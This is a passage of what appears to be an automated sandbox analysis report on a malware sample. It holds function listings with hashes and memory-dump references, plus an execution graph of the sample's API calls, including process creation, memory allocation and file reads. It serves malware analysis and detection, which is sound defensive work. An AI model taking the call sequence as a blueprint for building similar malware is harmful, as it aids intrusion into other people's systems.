                                  • Opcode ID: d8ea9b1b00a5fc92996ce86aa369c1629ee5cbef3da9e892529cfe24b99f02da
                                  • Instruction ID: 3224f910365d869be75c04586cee9dd352aaf97588c770c57158c48882b116b9
                                  • Opcode Fuzzy Hash: d8ea9b1b00a5fc92996ce86aa369c1629ee5cbef3da9e892529cfe24b99f02da
                                  • Instruction Fuzzy Hash: 7E515476E0021AAFEF08CF98D848ADDBBB2BF58714F14802AE905BB250D7749942CF54
                                  Function 01187B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID:
                                  • API String ID: 4281723722-0
                                  • Opcode ID: 9bbbbd51bec80878438454bdcdbba5bab9b66032212b97e259a7c69a7129c4ee
                                  • Instruction ID: c6add486369f0371fae39fb3d906dbcb4a6fd50ba10fc7ca402c5a8f8b1b4023
                                  • Opcode Fuzzy Hash: 9bbbbd51bec80878438454bdcdbba5bab9b66032212b97e259a7c69a7129c4ee
                                  • Instruction Fuzzy Hash: 2E313875E04229AFCF29DFA8E858A9EBBF0FB58720F104129E512B7690D7359900CF94
                                  Function 011559C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 68b11d21276885b9d949ee70a76fd7188ed39c425080604c4144dcfff4625767
                                  • Instruction ID: 9f2605e50eafa56e294af011eb97370ad44057084d852064d8c0f83fb317ecea
                                  • Opcode Fuzzy Hash: 68b11d21276885b9d949ee70a76fd7188ed39c425080604c4144dcfff4625767
                                  • Instruction Fuzzy Hash: FF328D70D0026ADFDBA9CF68C984BEDBBB5BF08304F0081E9D969A7241D7745A84DF91
                                  Function 01197D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                  • Instruction ID: d4820eab2bb6ab852c94421030934fb51605ee143af45afb99f96cb0fcd71517
                                  • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                  • Instruction Fuzzy Hash: A791B171E1021A9BEF2CDF6DC881ABEBBA5BF45720F14451AE975E72C0E73099408F52
                                  Function 0116D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Bl$l
                                  • API String ID: 3446177414-208461968
                                  • Opcode ID: a8f25b702adbcb0f29a568c40a28165ee99c7b641cf87c780de9955482156a15
                                  • Instruction ID: 35b0f3dd692f09a95e46c198e6c72bfe1c424ca02e11b74e1ecc10bb93fda09f
                                  • Opcode Fuzzy Hash: a8f25b702adbcb0f29a568c40a28165ee99c7b641cf87c780de9955482156a15
                                  • Instruction Fuzzy Hash: 55A10A31B003298BEF39DB98E880BADB7B9BF44304F0540E9D589A7641CB76AD95CF51
                                  Function 01195DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                  Download Yara Rule
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 01195E34
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 6ec4a6bce3d65ac48bfa4c70cbead1bd708628b694ae7e2e5ea05f251763fc60
                                  • Instruction ID: f34682304546c5f6499527bce85ba80e61242d22f4b05e38cc578ed39417ff38
                                  • Opcode Fuzzy Hash: 6ec4a6bce3d65ac48bfa4c70cbead1bd708628b694ae7e2e5ea05f251763fc60
                                  • Instruction Fuzzy Hash: 6251BD7090C20693DF6FBA1CF545BAD7FA1EB00710F14C92AE0F582299DB3584D4874B
                                  Function 01184C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: 8fc05875a49a951c995cb5d398605fd6a3573fdc227a16530458eacf01f20071
                                  • Instruction ID: d715854f18a5c03e4724267e58af7d237c5ed6d16624c28d0ae1a86cb8995196
                                  • Opcode Fuzzy Hash: 8fc05875a49a951c995cb5d398605fd6a3573fdc227a16530458eacf01f20071
                                  • Instruction Fuzzy Hash: B25197B1A0020A8BCF2ADF98C4847ADFBF4AF64718F15C12ED0199B641EB709981CF80
                                  Function 0117D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 0117D959
                                    • Part of subcall function 01154859: RtlDebugPrintTimes.NTDLL ref: 011548F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$
                                  • API String ID: 3446177414-233714265
                                  • Opcode ID: d0e392d86d980a8a322414b913ff295fc34121ac812dd28bcc007717eb02fd21
                                  • Instruction ID: ca9b0200d8b350344f52436cfc6097a1fa6ab1be9209b36646befcebb86f447d
                                  • Opcode Fuzzy Hash: d0e392d86d980a8a322414b913ff295fc34121ac812dd28bcc007717eb02fd21
                                  • Instruction Fuzzy Hash: D251DF75A0424ADFDF2CDFE8E48879DBBB1BF48318F244159D5456B385D770A881CB80
                                  Function 011CFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $
                                  • API String ID: 3446177414-3993045852
                                  • Opcode ID: 736882e215e150ae64563bd84d9c15f662489456abff6b6b0227838ebf9fa21b
                                  • Instruction ID: 690d6a9b2bb4b6bbc0d89f04c8dd5d4788263f2f85350192bf60767109030129
                                  • Opcode Fuzzy Hash: 736882e215e150ae64563bd84d9c15f662489456abff6b6b0227838ebf9fa21b
                                  • Instruction Fuzzy Hash: A741BF75A0021AABDF19DF99D880AEEBBB6FF58B04F15401DE904A7342C7709902CF90
                                  Function 0114DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: bdeeccee7ebc44e5e772a31c6b2f3337321c013202950e8af459ad93784ca242
                                  • Instruction ID: 8d4fce28ccb47501e253aa6b6cca5f7a3af45282aa605da2e321ba74d57d1be0
                                  • Opcode Fuzzy Hash: bdeeccee7ebc44e5e772a31c6b2f3337321c013202950e8af459ad93784ca242
                                  • Instruction Fuzzy Hash: 08418DB16087069FCB14CF68D584A1ABBE4BF88718F04492EF588DB341D771EA06CF96

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:2.4%
                                  Signature Coverage:3%
                                  Total number of Nodes:927
                                  Total number of Limit Nodes:112
                                  execution_graph 102790 4a98c0 102791 4a9ca1 102790->102791 102793 4aa127 102791->102793 102794 4c6a50 102791->102794 102795 4c6a76 102794->102795 102802 4b2e90 102795->102802 102797 4c6a82 102798 4c6ab0 102797->102798 102805 4c3320 102797->102805 102809 4c5340 LdrLoadDll 102798->102809 102801 4c6ac1 102801->102793 102804 4b2e9d 102802->102804 102810 4b2de0 102802->102810 102804->102797 102806 4c337a 102805->102806 102807 4c3387 102806->102807 102858 4b1d60 102806->102858 102807->102798 102809->102801 102811 4b2df7 102810->102811 102827 4c1e80 LdrLoadDll 102810->102827 102817 4c1ee0 102811->102817 102814 4b2e03 102816 4b2e10 102814->102816 102820 4c5960 102814->102820 102816->102804 102828 4c5250 102817->102828 102822 4c5978 102820->102822 102821 4c599c 102821->102816 102822->102821 102842 4c4710 102822->102842 102827->102811 102829 4c526d 102828->102829 102832 4c5fc0 102829->102832 102831 4c1efd 102831->102814 102833 4c5fcf 102832->102833 102835 4c602c 102832->102835 102833->102835 102836 4c09c0 102833->102836 102835->102831 102837 4c09da 102836->102837 102838 4c09ce 102836->102838 102837->102835 102838->102837 102841 4c0e40 LdrLoadDll 102838->102841 102840 4c0b2c 102840->102835 102841->102840 102843 4c472d 102842->102843 102844 4c5fc0 LdrLoadDll 102843->102844 102845 4c473e 102844->102845 102851 2e72c0a 102845->102851 102846 4c4759 102848 4c6dc0 102846->102848 102854 4c52f0 102848->102854 102850 4c5a0a 102850->102816 102852 2e72c11 102851->102852 102853 2e72c1f LdrInitializeThunk 102851->102853 102852->102846 102853->102846 102855 4c530d 102854->102855 102856 4c5fc0 LdrLoadDll 102855->102856 102857 4c531e RtlFreeHeap 102856->102857 102857->102850 102859 4b1d98 102858->102859 102876 4b6f90 102859->102876 102861 4b1da0 102862 4b1ff9 102861->102862 102888 4c6ea0 102861->102888 102862->102807 102864 4b1db6 102865 4c6ea0 3 API calls 102864->102865 102866 4b1dc7 102865->102866 102867 4c6ea0 3 API calls 102866->102867 102868 4b1dd8 102867->102868 102891 4b55b0 102868->102891 102870 4b1e3a 102875 4b1e62 102870->102875 102921 4b61c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 102870->102921 102872 4b1de5 102872->102870 102920 4b5730 LdrLoadDll 102872->102920 102901 4b1870 102875->102901 102877 4b6fbc 102876->102877 102922 4b42f0 102877->102922 102879 4b6fce 102926 4b6e80 102879->102926 102882 4b6fe9 102884 4b6ff4 102882->102884 102936 4c4fe0 102882->102936 102883 4b7001 102885 4b7012 102883->102885 102887 4c4fe0 2 API calls 102883->102887 102884->102861 102885->102861 102887->102885 102961 4c52a0 102888->102961 102890 4c6ebb 102890->102864 102892 4b55c3 102891->102892 102893 4b55cd 102891->102893 102892->102872 102894 4b4240 LdrLoadDll 102893->102894 102895 4b5666 102894->102895 102896 4b4180 LdrLoadDll 102895->102896 102897 4b567a 102896->102897 102898 4b56a0 102897->102898 102899 4b4240 LdrLoadDll 102897->102899 102898->102872 102900 4b56c7 102899->102900 102900->102872 102968 4b7250 102901->102968 102903 4b1d55 102903->102862 102904 4b188a 102904->102903 102974 4bfec0 102904->102974 102907 4b1a91 102982 4c7fd0 102907->102982 102909 4b18e8 102909->102903 102977 4c7ea0 102909->102977 102910 4b1aa6 102916 4b1ab9 102910->102916 102988 4b0050 102910->102988 102911 4b0050 4 API calls 102911->102916 102914 4b1b70 102914->102916 103001 4b0310 102914->103001 102916->102903 102916->102911 102917 4b0310 2 API calls 102916->102917 103004 4b71f0 102916->103004 102917->102916 102918 4b1be9 102918->102916 102919 4b71f0 LdrLoadDll LdrInitializeThunk 102918->102919 102919->102918 102920->102870 102921->102875 102923 4b4336 102922->102923 102940 4b4180 102923->102940 102925 4b43c9 102925->102879 102927 4b6e9a 102926->102927 102935 4b6f76 102926->102935 102945 4b4240 102927->102945 102929 4b6edf 102950 4c4760 102929->102950 102931 4b6f24 102954 4c47b0 102931->102954 102934 4c4fe0 2 API calls 102934->102935 102935->102882 102935->102883 102937 4c4ffd 102936->102937 102938 4c5fc0 LdrLoadDll 102937->102938 102939 4c500e NtClose 102938->102939 102939->102884 102941 4b41a4 102940->102941 102944 4c41e0 LdrLoadDll 102941->102944 102943 4b41de 102943->102925 102944->102943 102946 4b4265 102945->102946 102947 4b4180 LdrLoadDll 102946->102947 102949 4b4270 102946->102949 102948 4b42b8 102947->102948 102948->102929 102949->102929 102951 4c477a 102950->102951 102952 4c5fc0 LdrLoadDll 102951->102952 102953 4c478b 102952->102953 102953->102931 102955 4c47ca 102954->102955 102956 4c5fc0 LdrLoadDll 102955->102956 102957 4c47db 102956->102957 102960 2e735c0 LdrInitializeThunk 102957->102960 102958 4b6f6a 102958->102934 102960->102958 102962 4c52ba 102961->102962 102963 4c5fc0 LdrLoadDll 102962->102963 102964 4c52cb RtlAllocateHeap 102963->102964 102964->102890 102965 4c5318 102964->102965 102966 4c5fc0 LdrLoadDll 102965->102966 102967 4c531e RtlFreeHeap 102966->102967 102967->102890 102969 4b725d 102968->102969 102970 4c09c0 LdrLoadDll 102969->102970 102971 4b7275 102970->102971 102972 4b727c SetErrorMode 102971->102972 102973 4b7283 102971->102973 102972->102973 102973->102904 103008 4c6d30 102974->103008 102976 4bfee1 102976->102909 102978 4c7eb6 102977->102978 102979 4c7eb0 102977->102979 102980 4c6ea0 3 API calls 102978->102980 102979->102907 102981 4c7edc 102980->102981 102981->102907 102983 4c7f40 102982->102983 102984 4c6ea0 3 API calls 102983->102984 102986 4c7f9d 102983->102986 102985 4c7f7a 102984->102985 102987 4c6dc0 2 API calls 102985->102987 102986->102910 102987->102986 102989 4b005b 102988->102989 102990 4b0060 102988->102990 102989->102914 102991 4c6d30 2 API calls 102990->102991 102998 4b0085 102991->102998 102992 4b00ec 102992->102914 102994 4b00f2 102996 4b011c 102994->102996 102997 4c5200 2 API calls 102994->102997 102996->102914 102999 4b010d 102997->102999 102998->102992 102998->102994 103000 4c6d30 2 API calls 102998->103000 103018 4c46c0 102998->103018 103024 4c5200 102998->103024 102999->102914 103000->102998 103002 4b0332 103001->103002 103003 4c5200 2 API calls 103001->103003 103002->102918 103003->103002 103005 4b7203 103004->103005 103032 4c4640 103005->103032 103007 4b722e 103007->102916 103011 4c5110 103008->103011 103010 4c6d61 103010->102976 103012 4c5176 103011->103012 103013 4c5131 103011->103013 103014 4c5fc0 LdrLoadDll 103012->103014 103015 4c5fc0 LdrLoadDll 103013->103015 103016 4c518c NtAllocateVirtualMemory 103014->103016 103017 4c514e 103015->103017 103016->103010 103017->103010 103019 4c46da 103018->103019 103020 4c5fc0 LdrLoadDll 103019->103020 103021 4c46eb 103020->103021 103030 2e72df0 LdrInitializeThunk 103021->103030 103022 4c4702 103022->102998 103025 4c521a 103024->103025 103026 4c5fc0 LdrLoadDll 103025->103026 103027 4c522b 103026->103027 103031 2e72c70 LdrInitializeThunk 103027->103031 103028 4c5242 103028->102998 103030->103022 103031->103028 103033 4c465e 103032->103033 103034 4c4693 103032->103034 103036 4c5fc0 LdrLoadDll 103033->103036 103035 4c5fc0 LdrLoadDll 103034->103035 103037 4c46a9 103035->103037 103039 4c467b 103036->103039 103041 2e72dd0 LdrInitializeThunk 103037->103041 103038 4c46b8 103038->103007 103039->103007 103041->103038 103042 4b6880 103043 4b6898 103042->103043 103047 4b68ef 103042->103047 103043->103047 103048 4b9f20 103043->103048 103045 4b68d9 103045->103047 103056 4ba1b0 103045->103056 103049 4b9f45 103048->103049 103050 4b4240 LdrLoadDll 103049->103050 103051 4ba027 103050->103051 103052 4b4240 LdrLoadDll 103051->103052 103053 4ba05f 103052->103053 103054 4b4240 LdrLoadDll 103053->103054 103055 4ba11e 103053->103055 103054->103055 103055->103045 103057 4ba1d6 103056->103057 103058 4c09c0 LdrLoadDll 103057->103058 103060 4ba227 103058->103060 103059 4ba59a 103059->103047 103060->103059 103103 4c5380 103060->103103 103062 4ba278 103063 4ba582 103062->103063 103065 4c7fd0 4 API calls 103062->103065 103064 4c6dc0 2 API calls 103063->103064 103064->103059 103066 4ba297 103065->103066 103066->103063 103067 4ba39a 103066->103067 103068 4c4710 2 API calls 103066->103068 103112 4b5280 103067->103112 103069 4ba31b 103068->103069 103069->103067 103074 4ba323 103069->103074 103072 4ba380 103073 4c6dc0 2 API calls 103072->103073 103077 4ba390 103073->103077 103074->103059 103074->103072 103075 4ba34f 103074->103075 103108 4b5170 103074->103108 103080 4c4fe0 2 API calls 103075->103080 103076 4ba3fa 103082 4ba42a 103076->103082 103083 4ba561 103076->103083 103077->103047 103079 4b5170 2 API calls 103079->103076 103081 4ba35f 103080->103081 103117 4c2500 LdrLoadDll LdrInitializeThunk 103081->103117 103118 4c5070 103082->103118 103086 4c6dc0 2 API calls 103083->103086 103087 4ba578 103086->103087 103087->103047 103088 4ba449 103127 4b7020 103088->103127 103090 4ba4b2 103090->103063 103091 4ba4bd 103090->103091 103092 4c6dc0 2 API calls 103091->103092 103093 4ba4e1 103092->103093 103134 4c4970 103093->103134 103097 4ba51c 103098 4ba523 103097->103098 103099 4c4970 2 API calls 103097->103099 103098->103047 103100 4ba549 103099->103100 103149 4c4520 103100->103149 103102 4ba557 103102->103047 103104 4c539d 103103->103104 103105 4c5fc0 LdrLoadDll 103104->103105 103106 4c53aa CreateProcessInternalW 103105->103106 103106->103062 103109 4b517c 103108->103109 103110 4c48b0 2 API calls 103109->103110 103111 4b51ae 103110->103111 103111->103075 103113 4b52b6 103112->103113 103114 4c4710 2 API calls 103112->103114 103115 4c5070 2 API calls 103113->103115 103114->103113 103116 4b52cb 103115->103116 103116->103063 103116->103076 103116->103079 103117->103072 103119 4c5091 103118->103119 103120 4c50d2 103118->103120 103121 4c5fc0 LdrLoadDll 103119->103121 103122 4c5fc0 LdrLoadDll 103120->103122 103124 4c50ae 103121->103124 103123 4c50e8 103122->103123 103158 2e72e80 LdrInitializeThunk 103123->103158 103124->103088 103125 4c5103 103125->103088 103128 4b703d 103127->103128 103159 4c4800 103128->103159 103130 4b708d 103131 4b7094 103130->103131 103132 4c48b0 2 API calls 103130->103132 103131->103090 103133 4b70bd 103132->103133 103133->103090 103135 4c498d 103134->103135 103136 4c5fc0 LdrLoadDll 103135->103136 103137 4c499e 103136->103137 103169 2e72d30 LdrInitializeThunk 103137->103169 103138 4ba4f5 103140 4c48b0 103138->103140 103141 4c4926 103140->103141 103142 4c48d1 103140->103142 103143 4c5fc0 LdrLoadDll 103141->103143 103144 4c5fc0 LdrLoadDll 103142->103144 103145 4c493c 103143->103145 103147 4c48ee 103144->103147 103170 2e72d10 LdrInitializeThunk 103145->103170 103146 4c496b 103146->103097 103147->103097 103150 4c4576 103149->103150 103151 4c4541 103149->103151 103153 4c5fc0 LdrLoadDll 103150->103153 103152 4c5fc0 LdrLoadDll 103151->103152 103155 4c455e 103152->103155 103154 4c458c 103153->103154 103171 2e72fb0 LdrInitializeThunk 103154->103171 103155->103102 103156 4c459b 103156->103102 103158->103125 103160 4c481e 103159->103160 103161 4c4867 103159->103161 103162 4c5fc0 LdrLoadDll 103160->103162 103163 4c5fc0 LdrLoadDll 103161->103163 103164 4c483b 103162->103164 103165 4c487d 103163->103165 103164->103130 103168 2e72f30 LdrInitializeThunk 103165->103168 103166 4c48a0 103166->103130 103168->103166 103169->103138 103170->103146 103171->103156 103172 4b0780 103173 4b0799 103172->103173 103174 4b07b4 103173->103174 103180 4b3f60 103173->103180 103176 4c09c0 LdrLoadDll 103174->103176 103177 4b07cc 103176->103177 103178 4b0800 103177->103178 103179 4b07ed PostThreadMessageW 103177->103179 103179->103178 103181 4b3f84 103180->103181 103182 4b3fc0 LdrLoadDll 103181->103182 103183 4b3f8b 103181->103183 103182->103183 103183->103174 103184 4c4e40 103185 4c4e5a 103184->103185 103186 4c5fc0 LdrLoadDll 103185->103186 103187 4c4e6b 103186->103187 103190 2e72af0 LdrInitializeThunk 103187->103190 103188 4c4e96 103190->103188 103191 4c0081 103205 4c4ea0 103191->103205 103193 4c00a2 103194 4c00b9 103193->103194 103213 4c4c80 LdrLoadDll 103193->103213 103196 4c00d5 103194->103196 103197 4c00c0 103194->103197 103198 4c4fe0 2 API calls 103196->103198 103199 4c4fe0 2 API calls 103197->103199 103200 4c00de 103198->103200 103201 4c00c9 103199->103201 103202 4c010a 103200->103202 103203 4c6dc0 2 API calls 103200->103203 103204 4c00fe 103203->103204 103206 4c4ebc 103205->103206 103207 4c4ebe 103206->103207 103208 4c4f0f 103206->103208 103210 4c5fc0 LdrLoadDll 103207->103210 103209 4c5fc0 LdrLoadDll 103208->103209 103211 4c4f25 NtReadFile 103209->103211 103212 4c4edb 103210->103212 103211->103193 103212->103193 103213->103194 103215 4b235c 103216 4b2375 103215->103216 103219 4b5a60 103216->103219 103218 4b2380 103220 4b5a93 103219->103220 103230 4c4b90 103220->103230 103223 4b5ab7 103223->103218 103227 4b5af2 103228 4c4fe0 2 API calls 103227->103228 103229 4b5b5c 103228->103229 103229->103218 103231 4c4baa 103230->103231 103232 